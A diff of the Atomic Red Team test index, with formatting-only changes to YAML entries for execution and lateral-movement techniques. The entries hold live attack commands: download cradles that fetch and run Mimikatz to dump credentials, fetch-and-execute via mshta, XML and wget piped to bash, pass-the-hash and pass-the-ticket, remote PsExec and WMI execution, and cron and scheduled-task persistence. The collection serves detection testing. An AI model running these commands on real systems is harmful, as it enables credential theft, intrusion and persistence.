-61860,7 +61860,7 @@ execution: a backdoor container, and run their malicious code remotely by using “kubectl exec”. -' + ' supported_platforms: - containers input_arguments: @@ -61875,20 +61875,20 @@ execution: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: | kubectl create -f src/busybox.yaml -n #{namespace} kubectl exec -n #{namespace} busybox -- #{command} cleanup_command: 'kubectl delete pod busybox -n #{namespace} -' + ' name: bash elevation_required: false T1053.007: @@ -61957,7 +61957,7 @@ execution: CronJob for scheduling execution of malicious code that would run as a container in the cluster. -' + ' supported_platforms: - containers input_arguments: @@ -61968,17 +61968,17 @@ execution: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: 'kubectl get cronjobs -n #{namespace} -' + ' name: bash elevation_required: false - name: CreateCronjob @@ -61990,7 +61990,7 @@ execution: CronJob for scheduling execution of malicious code that would run as a container in the cluster. -' + ' supported_platforms: - containers input_arguments: @@ -62001,20 +62001,20 @@ execution: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: 'kubectl create -f src/cronjob.yaml -n #{namespace} -' + ' cleanup_command: 'kubectl delete cronjob art -n #{namespace} -' + ' name: bash elevation_required: false T1053.003: @@ -62073,7 +62073,7 @@ execution: of the referenced file. This technique was used by numerous IoT automated exploitation attacks. -' + ' supported_platforms: - macos - linux @@ -62093,7 +62093,7 @@ execution: echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} cleanup_command: 'crontab /tmp/notevil -' + ' - name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, @@ -62101,7 +62101,7 @@ execution: schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - macos - linux @@ -62133,7 +62133,7 @@ execution: to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - linux input_arguments: @@ -62150,10 +62150,10 @@ execution: name: bash command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} -' + ' cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} -' + ' T1610: technique: external_references: @@ -62300,7 +62300,7 @@ execution: auto_generated_guid: f592ba2a-e9e8-4d62-a459-ef63abd819fd description: 'Executes commands via DDE using Microsfot Word -' + ' supported_platforms: - windows executor: @@ -62323,13 +62323,13 @@ execution: ok on a dialogue box, then attempt to run PowerShell with DDEAUTO to download and execute a powershell script -' + ' supported_platforms: - windows executor: command: 'start $PathToAtomicsFolder\T1559.002\bin\DDE_Document.docx -' + ' name: command_prompt - name: DDEAUTO auto_generated_guid: cf91174c-4e74-414e-bec0-8d60a104d181 @@ -62643,7 +62643,7 @@ execution: auto_generated_guid: 6fb61988-724e-4755-a595-07743749d4e2 description: 'Utilize launchctl -' + ' supported_platforms: - macos input_arguments: @@ -62658,10 +62658,10 @@ execution: executor: command: 'launchctl submit -l #{label_name} -- #{executable_path} -' + ' cleanup_command: 'launchctl remove #{label_name} -' + ' name: bash T1053.004: technique: @@ -62802,7 +62802,7 @@ execution: jse_path: description: 'Path for the macro to write out the "malicious" .jse file -' + ' type: String default: C:\Users\Public\art.jse ms_product: @@ -62813,7 +62813,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -62824,7 +62824,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -62833,13 +62833,13 @@ execution: Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore -' + ' name: powershell - name: OSTap Payload Download auto_generated_guid: 3f3af983-118a-4fa1-85d3-ba4daa739d80 description: 'Uses cscript //E:jscript to download a file -' + ' supported_platforms: - windows input_arguments: @@ -62857,7 +62857,7 @@ execution: cscript //E:Jscript #{script_file} cleanup_command: 'del #{script_file} /F /Q >nul 2>&1 -' + ' name: command_prompt - name: Maldoc choice flags command execution auto_generated_guid: 0330a5d2-a45a-4272-a9ee-e364411c4b18 @@ -62875,7 +62875,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -62886,7 +62886,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -62914,7 +62914,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -62925,7 +62925,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -62952,7 +62952,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -62963,7 +62963,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -62995,7 +62995,7 @@ execution: dependencies: - description: 'Microsoft Excel must be installed -' + ' prereq_command: | try { New-Object -COMObject "Excel.Application" | Out-Null @@ -63005,7 +63005,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft Excel manually to meet this requirement" -' + ' executor: command: | $fname = "$env:TEMP\atomic_redteam_x4m_exec.vbs" @@ -63077,7 +63077,7 @@ execution: dependencies: - description: 'Microsoft Word must be installed -' + ' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" @@ -63086,10 +63086,10 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" -' + ' - description: 'Google Chrome must be installed -' + ' prereq_command: | try { $chromeInstalled = (Get-Item (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe').'(Default)').VersionInfo.FileName @@ -63098,7 +63098,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Google Chrome manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -63107,7 +63107,7 @@ execution: name: powershell cleanup_command: 'Stop-Process -name mshta -' + ' - name: Potentially Unwanted Applications (PUA) auto_generated_guid: 02f35d62-9fdc-4a97-b899-a5d9a876d295 description: 'The Potentially Unwanted Applications (PUA) protection feature @@ -63119,7 +63119,7 @@ execution: instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify anti-pua protection). -' + ' supported_platforms: - windows input_arguments: @@ -63154,16 +63154,16 @@ execution: macro_path: description: 'Location of file which will be converted to a VBA macro -' + ' type: Path default: PathToAtomicsFolder/T1204.002/src/test9-GenericPayloadDownload.txt c2_domain: description: 'This required variable points to a user defined HTTP server that will host the file_name in the c2_parent_directory. -' + ' type: Url - default: + default: c2_parent_directory: description: | Parent directory where you have the "malicious" file on c2_domain server. @@ -63180,7 +63180,7 @@ execution: ms_product: description: 'Maldoc application Word or Excel -' + ' type: String default: Word dependency_executor_name: powershell @@ -63188,17 +63188,17 @@ execution: - description: 'Destination c2_domain name or IP address must be set to a running HTTP server. -' + ' prereq_command: 'if (#{c2_domain}) (exit 0) else (exit 1) -' + ' get_prereq_command: 'Write-Host "Destination c2 server domain name or IP address must be set and reachable for HTTP service" -' + ' - description: 'Microsoftt #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -63209,7 +63209,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: name: powershell command: | @@ -63222,7 +63222,7 @@ execution: cleanup_command: 'Remove-Item "C:\Users\$env:username\Desktop\#{file_name}" -ErrorAction Ignore -' + ' T1204.003: technique: external_references: @@ -63564,7 +63564,7 @@ execution: description: 'Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed. -' + ' supported_platforms: - windows input_arguments: @@ -63576,7 +63576,7 @@ execution: command: 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''#{mimurl}''); Invoke-Mimikatz -DumpCreds" -' + ' name: command_prompt elevation_required: true - name: Run BloodHound from local disk @@ -63596,15 +63596,15 @@ execution: dependencies: - description: 'SharpHound.ps1 must be located at #{file_path} -' + ' prereq_command: 'if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "#{file_path}\SharpHound.ps1" -' + ' executor: command: | write-host "Import and Execution of SharpHound.ps1 from #{file_path}" -ForegroundColor Cyan @@ -63613,7 +63613,7 @@ execution: Start-Sleep 5 cleanup_command: 'Remove-Item $env:Temp\*BloodHound.zip -Force -' + ' name: powershell - name: Run Bloodhound from Memory using Download Cradle auto_generated_guid: bf8c1441-4674-4dab-8e4e-39d93d08f9b7 @@ -63631,7 +63631,7 @@ execution: Start-Sleep 5 cleanup_command: 'Remove-Item $env:Temp\*BloodHound.zip -Force -' + ' name: powershell - name: Obfuscation Tests auto_generated_guid: 4297c41a-8168-4138-972d-01f3ee92c804 @@ -63639,7 +63639,7 @@ execution: out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION" -' + ' supported_platforms: - windows executor: @@ -63654,7 +63654,7 @@ execution: will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed. -' + ' supported_platforms: - windows executor: @@ -63685,7 +63685,7 @@ execution: command: 'Powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1''); Invoke-AppPathBypass -Payload ''C:\Windows\System32\cmd.exe''" -' + ' name: command_prompt - name: Powershell MsXml COM object - with prompt auto_generated_guid: 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da @@ -63705,7 +63705,7 @@ execution: MsXml2.ServerXmlHttp;$comMsXml.Open(''GET'',''#{url}'',$False);$comMsXml.Send();IEX $comMsXml.ResponseText" -' + ' name: command_prompt - name: Powershell XML requests auto_generated_guid: 4396927f-e503-427b-b023-31049b9b09a6 @@ -63725,7 +63725,7 @@ execution: bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load(''#{url}'');$Xml.command.a.execute | IEX" -' + ' name: command_prompt - name: Powershell invoke mshta.exe download auto_generated_guid: 8a2ad40b-12c7-4b25-8521-2737b0a415af @@ -63743,7 +63743,7 @@ execution: executor: command: 'C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject(''script:#{url}'').Exec();close()" -' + ' name: command_prompt - name: Powershell Invoke-DownloadCradle auto_generated_guid: cc50fa2a-a4be-42af-a88f-e347ba0bf4d7 @@ -63785,26 +63785,26 @@ execution: dependencies: - description: 'PowerShell version 2 must be installed -' + ' prereq_command: 'if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Automated installer not implemented yet, please install PowerShell v2 manually -' + ' executor: command: 'powershell.exe -version 2 -Command Write-Host $PSVersion -' + ' name: powershell - name: NTFS Alternate Data Stream Access auto_generated_guid: 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680 description: 'Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed. -' + ' supported_platforms: - windows input_arguments: @@ -63815,14 +63815,14 @@ execution: dependencies: - description: 'Homedrive must be an NTFS drive -' + ' prereq_command: 'if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS") {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Prereq''s for this test cannot be met automatically -' + ' executor: name: powershell command: | @@ -63831,7 +63831,7 @@ execution: Invoke-Expression $streamcommand cleanup_command: 'Remove-Item #{ads_file} -Force -ErrorAction Ignore -' + ' - name: PowerShell Session Creation and Use auto_generated_guid: 7c1acec2-78fa-4305-a3e0-db2a54cddecd description: | @@ -63848,12 +63848,12 @@ execution: dependencies: - description: 'PSRemoting must be enabled -' + ' prereq_command: "Try {\n New-PSSession -ComputerName #{hostname_to_connect} -ErrorAction Stop | Out-Null\n exit 0\n} \nCatch {\n exit 1\n}\n" get_prereq_command: 'Enable-PSRemoting -' + ' executor: name: powershell elevation_required: true @@ -63887,7 +63887,7 @@ execution: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction @@ -63923,7 +63923,7 @@ execution: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation @@ -63954,7 +63954,7 @@ execution: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute @@ -63990,7 +63990,7 @@ execution: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments @@ -64003,7 +64003,7 @@ execution: outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. -' + ' supported_platforms: - windows input_arguments: @@ -64014,7 +64014,7 @@ execution: executor: command: 'powershell.exe -e #{obfuscated_code} -' + ' name: command_prompt - name: PowerShell Invoke Known Malicious Cmdlets auto_generated_guid: 49eb9404-5e0f-4031-a179-b40f7be385e3 @@ -64036,7 +64036,7 @@ execution: "PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy", "Set-CriticalProcess", "Set-MasterBootRecord" -' + ' executor: name: powershell elevation_required: true @@ -64050,7 +64050,7 @@ execution: auto_generated_guid: 1289f78d-22d2-4590-ac76-166737e1811b description: 'Check for privilege escalation paths using PowerUp from PowerShellMafia -' + ' supported_platforms: - windows executor: @@ -64135,7 +64135,7 @@ execution: $which_python -c 'import requests' 2>/dev/null; echo $? get_prereq_command: 'pip install requests -' + ' executor: command: | which_python=$(which python || which python3 || which python2) @@ -64175,7 +64175,7 @@ execution: dependencies: - description: 'Requires Python -' + ' prereq_command: | which_python=$(which python || which python3 || which python2); $which_python -V $which_python -c 'import requests' 2>/dev/null; echo $? @@ -64202,7 +64202,7 @@ execution: an external malicious script then executes locally using the supplied executor and arguments -' + ' supported_platforms: - linux input_arguments: @@ -64236,7 +64236,7 @@ execution: dependencies: - description: 'Requires Python -' + ' prereq_command: | which_python=$(which python || which python3 || which python2); $which_python -V $which_python -c 'import requests' 2>/dev/null; echo $? @@ -64259,7 +64259,7 @@ execution: name: sh cleanup_command: 'rm #{python_binary_name} #{python_script_name} #{payload_file_name} -' + ' T1053.005: technique: created: '2019-11-27T14:58:00.429Z' @@ -64357,7 +64357,7 @@ execution: description: 'Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. -' + ' supported_platforms: - windows input_arguments: @@ -64374,10 +64374,10 @@ execution: elevation_required: false command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} -' + ' cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 -' + ' - name: Scheduled task Remote auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd description: | @@ -64413,11 +64413,11 @@ execution: command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} -' + ' cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1 -' + ' - name: Powershell Cmdlet Scheduled Task auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd description: | @@ -64439,7 +64439,7 @@ execution: cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 -' + ' - name: Task Scheduler via VBA auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 description: | @@ -64456,7 +64456,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -64467,7 +64467,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -64480,7 +64480,7 @@ execution: login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. -' + ' supported_platforms: - windows executor: @@ -64492,7 +64492,7 @@ execution: cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false >$null 2>&1 -' + ' T1053: technique: id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 @@ -64706,7 +64706,7 @@ execution: sc.exe delete #{service_name} cleanup_command: 'del C:\art-marker.txt >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Use PsExec to execute a command on a remote host @@ -64740,10 +64740,10 @@ execution: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe}) -' + ' prereq_command: 'if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -64753,7 +64753,7 @@ execution: command: '#{psexec_exe} \\#{remote_host} -u #{user_name} -p #{password} -accepteula "C:\Windows\System32\calc.exe" -' + ' name: command_prompt T1129: technique: @@ -64886,7 +64886,7 @@ execution: description: 'An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console. -' + ' supported_platforms: - windows input_arguments: @@ -64902,10 +64902,10 @@ execution: - description: 'Radmin Viewer Utility must be installed at specified location (#{radmin_exe}) -' + ' prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1) -' + ' get_prereq_command: | echo Downloading radmin installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer} @@ -65128,20 +65128,20 @@ execution: dependencies: - description: 'Check if systemd-run exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; -' + ' executor: elevation_required: false command: 'systemd-run --user --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' -' + ' cleanup_command: | systemctl --user stop Atomic-Red-Team.service systemctl --user stop Atomic-Red-Team.timer @@ -65158,20 +65158,20 @@ execution: dependencies: - description: 'Check if systemd-run exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; -' + ' executor: elevation_required: true command: 'systemd-run --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' -' + ' cleanup_command: | systemctl stop Atomic-Red-Team.service systemctl stop Atomic-Red-Team.timer @@ -65238,7 +65238,7 @@ execution: auto_generated_guid: 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 description: 'Creates and executes a simple bash script. -' + ' supported_platforms: - macos - linux @@ -65255,7 +65255,7 @@ execution: sh #{script_path} cleanup_command: 'rm #{script_path} -' + ' name: sh - name: Command-Line Interface auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c @@ -65272,7 +65272,7 @@ execution: wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash cleanup_command: 'rm /tmp/art-fish.txt -' + ' name: sh T1204: technique: @@ -65429,7 +65429,7 @@ execution: dependencies: - description: 'The 64-bit version of Microsoft Office must be installed -' + ' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" @@ -65440,7 +65440,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -65449,7 +65449,7 @@ execution: cleanup_command: 'Get-WmiObject win32_process | Where-Object {$_.CommandLine -like "*mshta*"} | % { "$(Stop-Process $_.ProcessID)" } | Out-Null -' + ' name: powershell - name: Extract Memory via VBA auto_generated_guid: 8faff437-a114-4547-9a60-749652a03df6 @@ -65468,7 +65468,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -65479,7 +65479,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -65488,7 +65488,7 @@ execution: cleanup_command: 'Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin" -ErrorAction Ignore -' + ' name: powershell T1059.003: technique: @@ -65539,7 +65539,7 @@ execution: description: 'Creates and executes a simple batch script. Upon execution, CMD will briefly launch to run the batch script then close again. -' + ' supported_platforms: - windows input_arguments: @@ -65555,27 +65555,27 @@ execution: dependencies: - description: 'Batch file must exist on disk at specified location (#{script_path}) -' + ' prereq_command: 'if (Test-Path #{script_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item #{script_path} -Force | Out-Null Set-Content -Path #{script_path} -Value "#{command_to_execute}" executor: command: 'Start-Process #{script_path} -' + ' cleanup_command: 'Remove-Item #{script_path} -Force -ErrorAction Ignore -' + ' name: powershell - name: Writes text to a file and displays it. auto_generated_guid: 127b4afe-2346-4192-815c-69042bec570e description: 'Writes text to a file and display the results. This test is intended to emulate the dropping of a malicious file to disk. -' + ' supported_platforms: - windows input_arguments: @@ -65590,17 +65590,17 @@ execution: executor: command: 'echo "#{message}" > "#{file_contents_path}" & type "#{file_contents_path}" -' + ' cleanup_command: 'del "#{file_contents_path}" >nul 2>&1 -' + ' name: command_prompt - name: Suspicious Execution via Windows Command Shell auto_generated_guid: d0eb3597-a1b3-4d65-b33b-2cda8d397f20 description: 'Command line executed via suspicious invocation. Example is from the 2021 Threat Detection Report by Red Canary. -' + ' supported_platforms: - windows input_arguments: @@ -65691,7 +65691,7 @@ execution: executor: command: 'wmic useraccount get /ALL /format:csv -' + ' name: command_prompt - name: WMI Reconnaissance Processes auto_generated_guid: 5750aa16-0e59-4410-8b9a-8a47ca2788e2 @@ -65703,7 +65703,7 @@ execution: executor: command: 'wmic process get caption,executablepath,commandline /format:csv -' + ' name: command_prompt - name: WMI Reconnaissance Software auto_generated_guid: 718aebaa-d0e0-471a-8241-c5afa69c7414 @@ -65715,7 +65715,7 @@ execution: executor: command: 'wmic qfe get description,installedOn /format:csv -' + ' name: command_prompt - name: WMI Reconnaissance List Remote Services auto_generated_guid: 0fd48ef7-d890-4e93-a533-f7dedd5191d3 @@ -65739,7 +65739,7 @@ execution: executor: command: 'wmic /node:"#{node}" service where (caption like "%#{service_search_string}%") -' + ' name: command_prompt - name: WMI Execute Local Process auto_generated_guid: b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3 @@ -65756,11 +65756,11 @@ execution: executor: command: 'wmic process call create #{process_to_execute} -' + ' cleanup_command: 'wmic process where name=''#{process_to_execute}'' delete >nul 2>&1 -' + ' name: command_prompt - name: WMI Execute Remote Process auto_generated_guid: 9c8ef159-c666-472f-9874-90c8d60d136b @@ -65791,11 +65791,11 @@ execution: command: 'wmic /user:#{user_name} /password:#{password} /node:"#{node}" process call create #{process_to_execute} -' + ' cleanup_command: 'wmic /user:#{user_name} /password:#{password} /node:"#{node}" process where name=''#{process_to_execute}'' delete >nul 2>&1 -' + ' name: command_prompt - name: Create a Process using WMI Query and an Encoded Command auto_generated_guid: 7db7a7f9-9531-4840-9b30-46220135441c @@ -65812,7 +65812,7 @@ execution: executor: command: 'powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA -' + ' name: command_prompt - name: Create a Process using obfuscated Win32_Process auto_generated_guid: 10447c83-fc38-462a-a936-5102363b1c43 @@ -65846,7 +65846,7 @@ execution: description: 'This test uses wmic.exe to execute a DLL function using rundll32. Specify a valid value for remote IP using the node parameter. -' + ' supported_platforms: - windows input_arguments: @@ -65870,12 +65870,12 @@ execution: get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/bin/calc.dll?raw=true" -OutFile "#{dll_to_execute}" -' + ' executor: command: 'wmic /node:#{node} process call create "rundll32.exe #{dll_to_execute} #{function_to_execute}" -' + ' cleanup_command: taskkill /f /im calculator.exe name: powershell - name: Application uninstall using WMIC @@ -66198,7 +66198,7 @@ lateral-movement: command: '[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") -' + ' name: powershell T1210: technique: @@ -66451,7 +66451,7 @@ lateral-movement: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) -' + ' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -66466,13 +66466,13 @@ lateral-movement: command: '#{mimikatz_path} "sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}" -' + ' name: command_prompt - name: crackmapexec Pass the Hash auto_generated_guid: eb05b028-16c8-4ad8-adea-6f5b219da9a9 description: 'command execute with crackmapexec -' + ' supported_platforms: - windows input_arguments: @@ -66501,14 +66501,14 @@ lateral-movement: - description: 'CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe}) -' + ' prereq_command: 'if(Test-Path #{crackmapexec_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe} -' + ' executor: command: "#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x #{command}\n" name: command_prompt @@ -66589,7 +66589,7 @@ lateral-movement: auto_generated_guid: dbf38128-7ba7-4776-bedf-cc2eed432098 description: 'Similar to PTH, but attacking Kerberos -' + ' supported_platforms: - windows input_arguments: @@ -66597,7 +66597,7 @@ lateral-movement: description: Ticket file name usually format of 'id-username\@domain.kirbi' (e.g. can be dumped by "sekurlsa::tickets /export" module) type: String - default: + default: mimikatz_exe: description: Path of the Mimikatz binary type: Path @@ -66606,10 +66606,10 @@ lateral-movement: dependencies: - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe}) -' + ' prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href @@ -66620,7 +66620,7 @@ lateral-movement: executor: command: '#{mimikatz_exe} "kerberos::ptt #{ticket}" -' + ' name: command_prompt - name: Rubeus Kerberos Pass The Ticket auto_generated_guid: a2fc4ec5-12c6-4fb4-b661-961f23f359cb @@ -66663,19 +66663,19 @@ lateral-movement: dependencies: - description: 'Rubeus must exist on disk at specified location (#{rubeus_path}) -' + ' prereq_command: 'if (Test-Path #{rubeus_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{rubeus_path} -' + ' - description: 'PsExec must exist on disk at specified location (#{psexec_path}) -' + ' 